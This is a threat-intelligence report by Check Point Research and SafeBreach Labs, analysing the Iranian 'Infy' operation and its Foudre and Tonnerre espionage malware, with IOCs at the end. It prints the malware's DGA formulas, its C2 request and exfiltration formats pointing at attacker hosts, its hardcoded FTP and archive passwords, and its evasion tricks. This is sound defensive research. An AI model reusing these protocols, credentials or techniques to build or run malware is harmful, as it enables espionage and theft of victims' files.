{ "id": "54c76a29-a3b7-42e3-9a38-5feb2f777e6a", "created_at": "2026-04-06T00:17:45.27639Z", "updated_at": "2026-04-10T03:36:22.895042Z", "deleted_at": null, "sha1_hash": "6443539cc59d9c8f4d6b3fa0ff38df5d7a02fa82", "title": "After Lightning Comes Thunder - Check Point Research", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 144760, "plain_text": "After Lightning Comes Thunder - Check Point Research\r\nBy etal\r\nPublished: 2021-02-08 · Archived: 2026-04-05 14:25:56 UTC\r\nThe Most Persistent Iranian APT Rumbling Again\r\nBy: Safebreach Labs and Check Point Research\r\nSummary\r\nCyber warfare has long become a common practice in the arsenal of governments, armies, and intelligence agencies around\r\nthe world. What once used to be a black art, reserved to the elite of the elite and conducted by few, has now become a land\r\nof opportunities for almost any government around the world. Iran is no exception to this trend, with new discoveries made\r\nevery year repeatedly attributed to the Islamic republic.\r\nOne of the earliest Iranian cyber operations that was ever brought to light was “Infy” (aka “Prince of Persia”). Evidence for\r\nactivities of this operation dates back to 2007. This cyber operation was very active since its early stages, and was shown to\r\ntarget victims mainly in Iran and throughout Europe, and was likely a government-backed operation.\r\nIn this research, which is a cooperation between SafeBreach Labs and Check Point Research, we identify evidence of\r\nrenewed activity by this operation. It seems that following a long downtime, the Iranian cyber attackers were able to\r\nregroup, fix previous issues and dramatically reinforce their OPSEC activities as well as the technical proficiency and\r\ntooling capabilities.\r\nThis report will shed new-light on this long lasting Iranian cyber operation – revealing new techniques used, the underlying\r\ninfrastructure, stealth techniques and other new elements of this actor’s modus operandi.\r\nKey findings:\r\n1. A new, previously unknown, second stage malware with extended capabilities.\r\n2. A more mature form of the known “Infy” malware family.\r\n3. A review of recent C2 infrastructure including HTTP/FTP servers and RSA signatures.\r\nBackground\r\nIn 2016, Palo Alto Networks’ Unit 42 discovered Infy, an APT which was presumed attributed to Iran and had an interesting\r\nchoice of targets, amongst them US Government and Israeli companies. The operation’s activity had been traced all the way\r\nto 2007. At the time, Qi-Anxin focused on a specific attack targeting Danish diplomats, and named the attack Operation\r\nMermaid, which covered the same methods and infrastructure.\r\nAfter the publication, Unit 42 decided to conduct a takedown operation. This gave the researchers more visibility about the\r\norigin of victims, the motive of the attackers and the scope of the attack. The data gathered reaffirmed the Iranian connection\r\n– most victims were either in Iran, or were Iranian dissidents, and the attackers did not seem to be financially motivated. As\r\na result of the takedown Infy lost access to almost all of the campaign victims.\r\nResearch by Claudio Guarnieri and Collin Anderson elaborated more on the Iranian attribution.\r\nThe threat group compromised two news websites related to Jundallah as early as 2010, and exploited ActiveX\r\nvulnerabilities to attack the websites’ visitors. Infy seemed to have operated heavily around the 2013 Iranian Presidential\r\nelections, targeting Persian press members (such as BBC Persian), and resumed attacking civil society members and\r\nactivists afterwards.\r\nGuarnieri \u0026 Anderson also observed that after the takedown by Palo Alto Networks, the Telecommunication Company of\r\nIran blocked and redirected any traffic originating from Iran and aimed at Palo Alto’s sinkholes. This was probably a\r\ndeliberate attempt by the actors to reduce visibility and regain control of the victims. This is not an ability demonstrated by\r\nmost threat actors (indeed, we are hard-pressed to find precedent for it), and it suggests a potential connection to the Iranian\r\ngovernment.\r\nFollowing these events, the operation wound down until August 2017, when Infy’s activity was observed again, this time\r\nthrough the use of a new malware dubbed Foudre.\r\nRecent activity – lightning strikes again\r\nDuring the first half of 2020, new versions of Foudre emerged with new documents designed to lure victims. These operated\r\nin a slightly different manner than before – instead of having the victim click on what appears to be a link to a video, the\r\nmalware would run a macro once the victim closes the document.\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 1 of 17\n\nFigure 1: Full infection chain.\r\nFigure 2: Example of a document sent to potential victims.\r\nOne document (Figure 2) contained a photo of Mojtaba Biranvand, the governor of Dorud city in Lorestan Province, Iran.\r\nThe document is in Persian and includes information regarding the governor’s office and his phone number (the number\r\nactually belongs to a lawyer in Lorestan).\r\nAnother document, also in Persian, contains the logo of ISAAR, the Iranian government-sponsored Foundation of Martyrs\r\nand Veterans Affairs which provides loans to disabled veterans and families of martyrs.\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 2 of 17\n\nFigure 3: ISAAR document sent to potential victims.\r\nWhen the victim opens the document, a macro extracts the embedded package to the temp directory as fwupdate.temp and\r\nexecutes it after the document closes.\r\nIn 2018 Intezer covered Foudre version 8, which contained a certain sample labeled unknown binary that was not explored\r\nin Intezer’s research. In fact, this was a new component — called Tonnerre — which was a new step in the evolution of\r\nInfy, and contained various functionality absent from Foudre alone.\r\nVictims\r\nWe used several methods to try and determine the current victims of Foudre \u0026 Tonnerre.\r\nThe first was registering the DGA domains ourselves, and listening to coming connections with the parameters the malware\r\nsent. We filtered out repeat connections, which were uncommon to the malware (these could indicate traffic generated by\r\nresearchers – we can only speculate). Only a few dozen victims contacted our servers.\r\nA curious point is that none of these victims were Iranian, which may indicate the attackers learned from the takedown and\r\nhad the DNS records in Iran changed preemptively (although this, again, is purely speculation).\r\nThe second method we used to probe the campaign was passive DNS. That way we were able to see a broader scope of the\r\nattack. For example, we could see if some IP address was the origin of several resolution requests in succession, and in some\r\ncases if the connectivity check occurred right before attempting to connect to the C2 server. Ignoring traffic which doesn’t\r\ncorrelate with the correct dates for the domain, we were left with a handful of new victims. Two targets with persistent\r\nconnectivity, as well as a connectivity check prior to contacting the C2, were in Turkey – one belongs to a University, and\r\nthe other belongs to a state owned investment bank.\r\nBelow is the distribution of victims by geolocation. These correlate with previous findings on Infy, except for the glaring\r\nabsence of Iranian victims.\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 3 of 17\n\nFigure 4: Victim distribution by country\r\nFoudre Known Versions\r\nVersion No. Timestamp Notes\r\nFoudre 1-2 Februrary 2017 Discovered by Palo Alto in 2017\r\nFoudre 3 October 2017  \r\nFoudre 7 Probably April 2018 Newly discovered\r\nFoudre 8 August 2018 Discovered by Intezer in 2018\r\nFoudre 20 April 2020 Newly Discovered\r\nFoudre 21 July 2020\r\nFoudre 22 October 2020\r\nFoudre Version Differences\r\nMost differences include minor technical detail, such as Window names, Export function names and strings. However the\r\nlatest versions of Foudre include some key differences:\r\nDGA Formula – The updated algorithm for generating domains computes a CRC32 of the string NRV1{}{}\r\n{}.format(date.year, date.month, weeknumber) , with a start date of December 27, 2018.\r\nThe possible TLDs are: .space , .net, .dynu.net, .top .\r\nThis is probably to evade detection of security vendors who are using the previously published DGA.\r\nC2 RSA Verification – Foudre verifies the server is authentic by downloading a signature file, signed by the server\r\nand verifying it. This makes the operation more resilient against third-party takedowns.\r\nFoudre string not present – In previous versions the window which was used for keylogging was named “Foudre”,\r\nwhich brought the malware its name. In the latest version, this was changed to “Form1”. This change could help the\r\nmalware evade signature detection (and generally, this sort of thing should be kept in mind when writing signatures).\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 4 of 17\n\nFigure 5 – Foudre version 20. \r\nEmbedded articles\r\nOne of the discoveries that caught our eye during the analysis was a unique piece of text embedded in each of the binaries.\r\nThis text was copied from various media websites from around the time when the binary was released. This finding can\r\nconfirm that the date of the sample is at most as old as those articles.\r\nFoudre version 21 included a text from an article published on July 29.\r\nFigure 6 – July 2020 article embedded into Foudre version 21\r\nFoudre version 22 had the next message, coming from an article published by the BBC:\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 5 of 17\n\nFigure 7 – October 2020 article embedded into Foudre version 22\r\nAfter connecting to the C2, Foudre downloads an encrypted self-extracting archive (SFX), and then decrypts and runs it. The\r\nSFX includes an executable and an RSA public key.\r\nTonnerre – Second-Stage Payload\r\nFoudre’s new versions were downloading Tonnerre 11 as the payload, but the first two versions were also tracked. Version\r\n“10” is actually the earliest sample, which was dropped by Foudre 8. For more information, see Appendix B.\r\nVersion No. Time of emergence Notes\r\n10 – MaxPinner August 2018 From Foudre 8\r\n1 September 2018 Newly discovered\r\n2 March 2019 Newly discovered\r\n11 Probably July 2020 Newly discovered – latest version\r\nTonnerre is used to expand the functionality of Foudre; possibly its functionality was put into a separate component to make\r\nsure it is deployed only when needed, and meets fewer prying eyes. Like Foudre, it is written in Delphi.\r\nIts capabilities:\r\nSteals files from predefined folders as well as external devices.\r\nExecutes commands from the C2 server.\r\nRecords sound.\r\nCaptures screen.\r\nThe executable is exceptionally large at 56Mb, and camouflages itself as legitimate software.\r\nVersion 1 is camouflaged as “SilverSoft Speed”, and version 11 as “Synaptics”.\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 6 of 17\n\nFigure 8  – Tonnerre v.1 – Silversoft Speed. \r\nLike Foudre, Tonnerre has embedded strings from news articles which reinforces the notion that both tools come from the\r\nsame developers.\r\nFigure 9  – Tonnerre version 11 hardcoded strings.\r\nSimilar to Foudre, Tonnerre uses a DGA to find its C2, and verifies it as a valid server using an RSA signature, which is\r\ndecrypted with the public key from the SFX.\r\nTonnerre uses this C2 to:\r\nStore general metadata about the victim\r\nSteal files with predefined extensions\r\nDownload updates.\r\nGet an additional C2.\r\nThe second C2 is used to store the stolen data, and it can also provide a list of commands to run.\r\nCommunication to the first C2 uses HTTP, whereas the second C2 communicates using FTP. The FTP password is\r\nhardcoded in the malware, but the username is the name of the victim’s computer, which was previously sent to the HTTP\r\nC2.\r\nAppendix A – Tonnerre deep dive\r\nForms\r\nThe malware contains 5 Delphi forms, with each one responsible for a different capability:\r\nForm1 – Malware Installation and upgrading process.\r\nThe malware runs for the first time with param /set \u003cmachine GUID in hex\u003e, creates an installation folder and copies itself\r\nas helper.exe. The second installation stage creates a link and runs its persistence mechanism:\r\nA scheduled task for helper.exe -ex \u003cmachine GUID in hex\u003e.\r\nRegistry “Run” key.\r\nRunning it with a wrong GUID, or on another machine will fail because the malware verifies that GUID value. It also\r\nverifies that the “Deep Freeze” process is not running, otherwise Tonnerre exits immediately.\r\nTonnerre also checks for the presence of Kaspersky endpoint protection by looking for a “Kaspersky Lab” folder under\r\n%programfiles%. If this folder exists, the malware tries to bypass detection by performing a sleep cycle after setting its\r\npersistence.\r\nForm2 – Collects files from predefined folders – Documents, Downloads, Pictures and more. It also sets a notify event for\r\nspecific file types like MS Word files.\r\nFiles are also collected from network shares using WNetOpenEnumW and WNetEnumResourceW functions from mpr.dll.\r\nPrint screens are also collected if the screen saver is not active at the moment of checking.\r\nForm3 – Connects to an FTP server to exfiltrate collected data and get further commands.\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 7 of 17\n\nForm4 – Collects files from removable devices for exfiltration. This is done by monitoring WM_DEVICECHANGE\r\nmessages and enumerating the devices.\r\nForm5 – Uses the lame command line tool to record sound. This is somewhat similar to another Iranian attributed APT,\r\nNazar, which used it as a DLL. Despite this similarity, there doesn’t seem to be a link between the groups.\r\nThe exact command line is: lame.exe -b 8 -m m rvfrtc8.tmp fcvd10v.tmp\r\nC2 Communication\r\nDGA\r\nThe dga start date is 12/25/2017 with the next TLDs: '.site','.com','.win' .\r\nThe domain is decided by the next formula:\r\n\"NITV1{}{}{}\".format(date.year, date.month, weeknumber)\r\nOne of the generated C2 servers is 638ffe48.site . Like all other domains since March 2020, this was resolved to the IP\r\naddress 185.141.61[.]37 .\r\nThe malware uses http://www.france24.com/en/top-stories/rss/ to get the current date for the DGA.\r\nReceiving Executable Updates\r\nFirst, just like Foudre, the malware verifies the HTTP C2 server by downloading a signature file using the next GET request:\r\n/s/?d=\u003cdays from first date\u003e\"\u0026t=\u003ctimestamp\u003e\"\r\nNext, after verifying the C2, the malware downloads the second signature file.\r\nGET /2017/?c=\u003ccomp-name\u003e\u0026u=\u003cuser-name\u003e\u0026v=00011\u0026f=fdir1\u0026mi=\u003cmachine-guid\u003e\u0026t=\u003ctimestamp|\u003e HTTP/1.1\r\nThe C2 server responds in a location field: update32.sig.\r\nThe sig file is downloaded from /2017/update32.sig\r\nFinally, a request is sent to 2016/update32.tmp (this URL was not responsive when we checked). An SFX is downloaded,\r\ndecrypted and executed, with a random looking password (in our case it was TtckjcAa54cE ).\r\nGetting the FTP Server\r\nThe malware gets the C2 FTP server IP address by performing the next request to the C2 server:\r\nGET /f/?c=\u003ccomputer-name\u003e\u0026mi=\u003cmachine-guid\u003e\u0026t=\u003ctimestamp\u003e HTTP/1.1\r\nThe C2 uses the same HTTP redirection with this response format:\r\n\u003cyear\u003e\u003cdays since last first dga day\u003e\u003c.tmp\u003e\r\nFor example: 2020209.tmp .\r\nIt then performs a GET request to /f/2020209.tmp . Example for a downloaded file:\r\n266/:5/321/93\r\nAVqGDTHK6ZAbnNtvg09lHkXUUBw2UYho18bjE9f6ILDw9SYCEPR0R1TS6+4H/UpjrV3Z+m0BpEaxdWW9qul9pDNYS7LkZOWx2G18JI8X/aWwC+yQoL2wC6aGZnBU+gSBAtK3NrerV\r\n69\r\n1512\r\n443\r\nThis file has 3 parts:\r\n1. The obfuscated FTP server. The IP could be retrieved easily using a python one-liner: print(bytes([ch-1 for ch in\r\nb'266/:5/321/93'])) which gives 155[.]94[.]210[.]82.\r\n2. An RSA signature of the FTP server.\r\n3. List of open ports on the FTP server.\r\nFrom this point on, the malware uses that server to fetch its next command. After executing the command, the output is\r\nuploaded using FTP as well.\r\nFTP Protocol\r\nLogin\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 8 of 17\n\nThe malware connects to the FTP server using its computer name as the username and one of two fixed passwords:\r\n“tpass15A42” or “tpass14A43”. The password can be decoded using the same Python snippet used for getting the FTP\r\nserver.\r\nFigure 10  – Deobfuscated FTP passwords.\r\nCommand Execution\r\nCommand execution process is done by downloading a command file from the FTP server. We were able to enumerate the\r\nfollowing commands:\r\nMyIdle\r\nMyDelete\r\nMyRename\r\nMyRun\r\nMyEndTask\r\nMyZip\r\nMyShell\r\nFTP – GET\r\nFTP – PGET – get multiple files.\r\nFTP – PUT – upload a file.\r\nFTP – upload dirlist (using FTP put)\r\nDual Data Exfiltration\r\nExfiltration of data which was collected based on the C2 server command is performed via FTP.\r\nExfiltration of data collected otherwise (built in Tonnerre logic) is performed via HTTP POST request:\r\nPOST /blog/?\u003ctimestamp\u003e HTTP/1.1\r\nAnd the next data fields:\r\nc=\u003ccomputer-name\u003e\u0026u=\u003cuser-name\u003e\u0026v=00011\u0026f=fdir1\u0026mi=\u003cmachine-guid\u003e\u0026txt=\u003cexfil data\u003e\u0026e=EOF\r\nThe C2 server response for a valid exfiltration is misleading:\r\n“There is a problem, the page you requested does not exist”\r\nThere are also custom 404 error response messages when requesting a valid directory in the server:\r\n“Not Found\r\nThe requested URL was not found on this server.\r\nAdditionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”\r\nTonnerre searches for files based on the file extension:\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 9 of 17\n\nFigure 11 – file types Tonnerre exfiltrates\r\nExfiltrated files\r\nAn example of the name of the file format is:\r\n\u003cfile name crc32\u003e-\u003cfile size\u003e-\u003cmodified timeStamp\u003e-\u003ccreated timeStamp\u003e\r\ne.g. ceb60f97-53807-1597696028-1360110435\r\nThe exfiltrated data is in a format of a WideChar array, and should end with the following suffix: \u003cComputer name\u003e\u003cuser-name\u003e\u003cversion\u003e\u003cdirectory\u003e\u003cmachine-guid\u003e\u003cexfil file path\u003e\r\nThe data also should be base64 encoded before put into the message body.\r\nThe content is – base64 encoded zlib encrypted file content and after it the file’s metadata in hex:\r\nComputer name, username, Tonnere version, uploaded dir in c2 server, machine GUID and file path in the victim’s machine.\r\nFile and input capture and collection\r\nThe malware creates several directories to store the stolen files:\r\n“R”, “F”, “H”, “V”, “S”, “G”.\r\nFigure 12  – The list of directories used for exfiltrated data: R,F,H,V,S\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 10 of 17\n\nG = Grabbed (files from recycle bin)\r\n`.doc` files grabbed from the recycle bin.\r\nF = Fixed (all .doc files from supported drive types)\r\nThe drive types that are supported: fixed, remote, ramdisk, removable\r\nS = Screen\r\nSaved as psf files (Print Screen File).\r\nH – files from predefined folders and network shares\r\nFiles from user directories (downloads, pictures, contacts) and from network shares are saved in H.\r\nR  = Recent files\r\nFiles that were written to the “Recent Items” folder, as enumerated in the\r\n`Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Recent` registry key.\r\nV = Voice Recording\r\nUsed for the voice recordings generated by Form 5.\r\nAppendix B – Foudre deep dive\r\nFoudre version 20-22\r\nC2 Protocol\r\nAs we showed previously, the C2 server is first authenticated by downloading a signature file obtained by querying the next\r\nHTTP GET request:\r\nGET \u003cC2 server host name\u003e/de/?d2020209.sig\u0026v=00020\u0026t=\u003ctimestamp\u003e HTTP/1.1\r\nThe server does HTTP redirection with the following value:\r\nLocation: \u003cC2 server host name\u003e/2020209.sig\r\nThis creates a GET request on this location:\r\nGET /de/\u003cC2 server host name\u003e/2020209.sig HTTP/1.1\r\nAfter the C2 server is verified as trusted, the malware checks for new versions of the malware by trying to download a\r\nsecond signature file.\r\nThis is done by the next GET request:\r\nhttp://\u003cC2 server host name\u003e/2015/?c=\u003ccomputer name\u003e\u0026u=\u003cusername\u003e\u0026v=00020\u0026\r\ns=Test201\u0026f=datadir1\u0026mi=\u003cmachine guid\u003e\u0026b=\u003cos 64/32 bit arch\u003e\u0026t=\u003ctimestamp\u003e\r\nFigure 13 – July 2020 article embedded into Foudre version 21\r\nThe C2 server returns a signature file named t00011-3.sig, which refers to Tonnerre version 11.\r\nThe final step is performing a request to download the latest version of the malware:\r\nGET /2014/t00011-3.tmp HTTP/1.1\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 11 of 17\n\nFigure 14 – July 2020 article embedded into Foudre version 21\r\nThe server responds with an encrypted RAR SFX file with the password RBA4b5a98Q.\r\nAfter decryption, we got the Tonnerre malware version 11 and a public key file.\r\nThe size of the malware is 56MB, an unusual size for malware samples and which may allow it to avoid detection as many\r\nvendors ignore large files and won’t scan\\monitor them.\r\nFigure 15  – t00011.tmp –  SFX file\r\nTonnerre 11 is the latest version served from the c2 as of our research. It has been using the exact same update file since at\r\nleast as early as 27/7/20, and until at least as late as 14/11/20.\r\nThe path of the embedded object C:\\Users\\Alex\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\   was also\r\nused in an earlier Word dropper which drops Infy version 21:\r\nFigure 16  – The embedded path into Version 21 document\r\nCampaign Names\r\nWhen we observed the HTTP requests, we could see the subject name “TehN005” which seems to have served as a sort of\r\ncampaign ID:\r\nhxxp://35b268a6.top/2015/?c=\u003ccomputer-name\u003e\u0026u=\u003cuser-name\u003e\u0026v=00022\u0026s=TehN005\r\n\u0026f=datadir1\u0026mi=\u003cmachine-guid\u003e\u0026b=64\u0026t=\u003ctimestamp\u003e\r\nFoudre Ver. 1 – 2017FSU\r\nFoudre Ver. 2 – 17weh44 – (probably 2017 week 44)\r\nFoudre Ver. 3 – af17818 – (probably 18/8/17) – was downloaded from the C2 http://eab6ff48[.]stream/update/af17818.tmp\r\nresolved to 185.148.144[.]3 (VirusTotal) which also resolved to eab6ff48.dynu.net. This means that Foudre was downloaded\r\nfrom an additional host name \u003cdga hostname\u003e.streamWas probably sent by email – (virusTotal 2017-10-06 14:13:29\r\n59bbae76 – email)\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 12 of 17\n\nFoudre Ver. 4/5 – DynuSub (probably refers to the C2 domain dynu.net)\r\nFoudre Ver. 7- S180313 – (probably 13/3/18)\r\nFoudre Ver. 11 – Rec11-1 – (probably Recording version 11)\r\nFoudre Ver. 20 – Test201 (Test 1 version 20)\r\nFoudre Ver. 21 – TehN002 – (probably version Number 2)\r\nFoudre Ver. 22 – TehN005 – (probably version Number 5)\r\nSFX File\r\nThe executable file dropped by the above macros is an SFX File – Self-Extracting archive.  When we decompress it, we get\r\nan extraordinary executable size – 275 MB.\r\nFigure 17 – SFX content of Foudre 21\r\nIt uses rundll to load “conf4389.dll” (Foudre loader), which in turn runs DLL “d488” and calls an exported function named\r\n“f8754”. The loader also creates a persistence mechanism by scheduling a task to run itself again.\r\nFoudre 8 – Tonnerre first occurrence\r\nAs mentioned previously, Tonnerre was already deployed in Foudre version 8 that was featured in Intezer’s publication.\r\nThe attack vector chosen was an SFX embedded into an office document. In the later versions that we analyzed, the contents\r\nof the SFX were different.\r\nFigure 18  – Content of Foudre 8 SFX\r\nc38533b85e4750e6f649cc407a50031de0984a8f3d5b90600824915433a5e218\r\nThe new SFX includes the following files:\r\n I7234.dll is the initial loader.\r\nd388 is the first loaded dll as Foudre version 8.\r\ndfbpbtge.tmp is a sample with different capabilities which is the successor of past “Infy M” – used as a second stage\r\npayload.\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 13 of 17\n\nFigure 19  – dfbptge.tmp – Tonnerre/“Max Pinner”\r\nThis loader executes what was defined by Intezer as an “unknown binary”. The execution of this binary happens only in the\r\nabsence of the process “dfserv.exe”, which belongs to Faronics’ Deep Freeze.\r\nThe payload also checks if previous versions of this malware family are already installed on the victim’s computer. The\r\ncheck is done by searching for the window name Tonnerre from version 1 to 9.\r\nThe C2 server has a fixed hardcoded address instead of the usual DGA algorithm used by Foudre. The decrypted C2 is\r\n`pinner.website` which probably explains why this version was named MaxPinner internally.\r\nFigure 20  – dfbptge.tmp – Tonnerre appears for the first time.\r\nFigure 21  – dfbptge.tmp – fixed C2 server – pinner.website.\r\nFoudre 7 – previously unknown\r\nThe sfx is quite different from other versions:\r\nIt includes a white picture image file Thumbs.bmp which has a size of 63M probably to increase the size of the SFX. There\r\nis also a third dll, “r3066”, which is just used to call the D2 export of the main Foudre’s dll d392 instead of calling it from\r\nthe loader dll i7765.dll.\r\nThe decoy movie is violent and is called shkanje46.mp4, which in Persian means trigger46 (another hint for the attacker\r\nattribution and the native language of the victim).\r\nFoudre 7 is the last version that used obfuscation of strings.\r\nFigure 22 – Content of Foudre 7 SFX\r\nAppendix C – IOCs\r\nHashes\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 14 of 17\n\nFoudre 3 dll\r\nCBA270CBB084929E51BCF68145992FF3DD048887F4B9ED3A54970F1151BB1FDF\r\nFoudre 4 dll\r\n00cfef0d163b6cb312c07b4b49bd230121db15433204bc674350a8126665ba0f\r\nFcd23c3e7e4027425786d4dfdf6e56912ad59bc5db935d32bf877b34bb7e4a86\r\nbebfbc715a0236b4fd93347f69c93aae34acbb6f9f9555284edf22378fbeb86a\r\nFoudre 5 dll\r\ne6eed21fa1c9dc28b140a4b7633636461eefaeab214647f53d3b666158c28674\r\nfa48da8189b9f4dd8ad011a0bac135ae82f9d493d6a9feeea5ac1abeae8ce202\r\nFoudre 7 dll\r\n4BA5192DAB8C27DB8BBA0E5B9D6887EA81299C88536FA590735E55B88AACE759\r\nFoudre 11 dll\r\n20ffed3d57e4a49d0e20f18283ae7e5e5a7ef3249be3f04b50e78f10ec8b8989\r\nFoudre 20 dll 941CA9F74FBC5E73C9C8248548C1F0D1ADC646126EE6C45A0CE34FE39A52F030\r\nFoudre 21 dll\r\n0B094D25E97CC254A53BEC0943D682C1EEBBF7437067B14C7B71619110DFAF83\r\nFoudre 22 dll\r\n6931EE281C895BB9446689C8CB648E2ED353B06D454CFB4418490EF82CA07BF1\r\n4853a8acc62d6586eddfb30dcbb97ffa82c5f65460708fd3a969c88e29f99160\r\nimpHash Foudre version 21-22 dll\r\n78d9bed21db68b9d8c53b8f62bc5314f\r\nTonnerre 1 exe\r\nE124c048f5ddf2d9af6dcb6f8a70d6a2b2f79a0ba9486b17b52baae98d8d23de\r\nTonnerre 2 exe\r\n6254613570fb43ae1b95bc08868a6023c2c04f8b69fe3e5ce0ffb6db273afddc\r\nTonnerre 11 exe\r\n82D370D941FCDE13DFC568FDCA007BF469E5900B6F6B93C1829AB0CC7ED0F56C\r\nMalicious Word doc with macro dropper\r\nVersion 22 dropper  b97960c29b7c8234981728b80060a42dbe32bf625b052854a6cc2175467cca89\r\nVersion 21 dropper ccbda8a84dbeda1a66780c76fd9f507778c9fb992c7eee87e99cc3ca314009ee\r\nFoudre SFX\r\nVersion 3\r\n160bb722bd70b70c3e993c8eba59d8cf8117899073a4a6e42b0240d858a98dad\r\nVersion 7\r\n97dfd41db47149a815f59eae44b490ba10af588b69fbea2a84d7a2ae448a37a0\r\nVersion 21  A64EDB19E71549FB9248B27B58F911A4A1E8CD8B8E4ADFF93ECFB7E15A3CDAD7\r\nversion 22\r\nF535b46ad2452d61282f615faf35993e83b6c56c9533bf22c12f97f318242e06\r\nFoudre Loaders\r\nVersion 7\r\nVersion 21 conf3234.dll\r\nF48CC6F80A0783867D2F4F0E76A6B2C29D993A2D5072AA10319B48FC398D8B7A\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 15 of 17\n\nVersion 22  conf4389.dll\r\n9F64EC0C41623E5162E51D7631B1D29934B76984E9993083BDBDABFCCBA4D300\r\nVersion 22 identical to conf4389 but chopped suffix (1.1M instead of 4.3M)\r\n7ac73f2e5ea0ca430cf21738d3854b8a5b6a25ae4a85d140fc7e96cb87f7e2ea\r\nAll have imphash: 39507b319f55d0fec705f6dea39a0dfb\r\nTonnerre SFX\r\n21265793D0B91845145EA37BE68627855503C5505248C3CA31399CB3A9C288B4\r\nTonnerre cert file\r\n87C70DA933731D0E0AC58EAD236E0FB21F2A7E1BBEEAF37EE78D0DFBD70FD961\r\nDomains\r\nFoudre 20 C2 domains:\r\n2020-11-03 35b268a6.top\r\n2020-11-03 35b268a6.space\r\n2020-11-10 1e9f3b65.top\r\n2020-11-10 1e9f3b65.space\r\n2020-11-17 07840a24.top\r\n2020-11-17 07840a24.space\r\n2020-11-24 801c16eb.top\r\n2020-11-24 801c16eb.space\r\n2020-12-01 8bb28844.top\r\n2020-12-01 8bb28844.space\r\n2020-12-08 5bb2593a.top\r\n2020-12-08 5bb2593a.space\r\n2020-12-15 42a9687b.top\r\n2020-12-15 42a9687b.space\r\n2020-12-22 69843bb8.top\r\n2020-12-22 69843bb8.space\r\n2020-12-29 709f0af9.top\r\n2020-12-29 709f0af9.space\r\nTonnerre 11 C2 domains:\r\n2020-11-03 a74d1205.site\r\n2020-11-10 3e4443bf.site\r\n2020-11-17 49437329.site\r\n2020-11-24 d9fc6eb8.site\r\n2020-12-01 acbde077.site\r\n2020-12-08 cc7a6992.site\r\n2020-12-15 bb7d5904.site\r\n2020-12-22 227408be.site\r\nIP Addresses\r\nHTTP Servers\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 16 of 17\n\nFoudre\r\n172.96.184.191 – active since 15/12/2020\r\n185.56.137.138 – was active until 15/12/2020 \r\n185.28.189.215\r\n185.61.154.26\r\n198.252.108.158\r\nTonnerre\r\n93.115.22.216 – active since 6/1/21\r\n185.203.116.111 – active until 6/1/21\r\n185.141.61.37\r\n185.206.144.175 \r\nFTP Servers\r\n54.37.60.199 – new server since 30/12/20\r\n54.36.40.208\r\n79.137.24.207\r\n155.94.211.212\r\n155.94.210.82\r\nRSA Certificates\r\nTonnerre Public Certificate file content\r\n4E 0A 4C 6F 63 6B 42 6F 78 33 01 00 00 00 03 00 01 00 00 51 F0 00 D8 97 48 C7 5B 0A BF F4 98 AB C6 1F 28 13 FC\r\nD7 C5 5E E4 A6 71 E5 41 8E F4 8D 41 BD 8F 4C E3 EF 3F FC 8C BD B9 4F 55 F6 E5 0F 83 D9 D3 D4 56 FC DC D0 BE\r\n5B 5F 29 37 0F 87 43 5E D0 1C 2F 49 8D 2F 88 49 A3 88 DA 4A CE 37 95 81 6C C1 DF 40 1F 43 27 6C A6 11 57 E1 8B\r\nBA B2 1A 9F 1D F0 F5 C0 18 64 6F CB D0 07 8A 9C 39 87 A3 77 0E 33 C2 6F 6E FA 89 73 9B 4A 92 90 79 58 07 F4 79\r\nA9 0F 30 9D 9C 28 24 3E 3B 6B 3B 69 87 14 AF 99 FC 9F 24 47 BC BB 2A A1 2A 68 4F B4 5E E5 E5 5C C8 24 DA D6\r\n8B 40 F2 5E EA D5 C9 EE 42 5D B0 43 A4 C3 EE 91 8E 54 AE E8 A0 26 4C 11 8F 23 1C 71 43 73 07 99 98 9A 00 59 8A\r\n96 42 0F C1 15 A4 E0 39 0F 17 E6 17 7B B6 54 1D 83 61 A1 8F D2 1A 72 04 33 67 C6 92 7E 2B F6 C2 24 C6 92 D9 94\r\n19 09 8C 5C 5C 2A 4E 6A AD F6 EA CD 33 5F 6C E5 40 BC 03 00 00 00 01 00 01 4E 0A 4C 6F 63 6B 42 6F 78 33 01 00\r\n00 00 03 00 01 00 00 3B 88 FB D8 1F C2 3F 35 1F 2D EB 36 D6 16 C2 DE 64 2C 5A 8C 6F FD 0E B7 DB 17 37 D4 1A\r\n1A 55 A7 A5 0B 28 F3 01 31 EE 5C A5 5B 50 69 E5 94 63 95 2C 9D E4 1D D7 3A 87 36 C7 AE 81 80 F0 25 6A 7C BB 48\r\nCE 9D E3 74 13 B4 7C 15 56 62 08 5C AB F2 4B 68 2A C3 60 80 CB 2F FD 88 85 32 63 43 9C 47 90 89 2A A3 CF 5A 89\r\nA5 69 19 9E 81 94 0C C3 7E 9B A6 80 95 CC 01 CF D4 44 6F FA CC E1 07 0D 17 24 EB 97 6C 8D CC 35 0A C0 51 12\r\nF4 C8 E7 E9 1F 4C 42 50 DE 5C 8A 94 24 71 8A C9 B2 D0 C5 75 0B 82 1C 36 5A C6 B9 10 B4 6E 21 F3 FD E8 B1 A5\r\n4A C8 DA 4B 74 99 F8 29 47 0C 5E E4 EC 9F 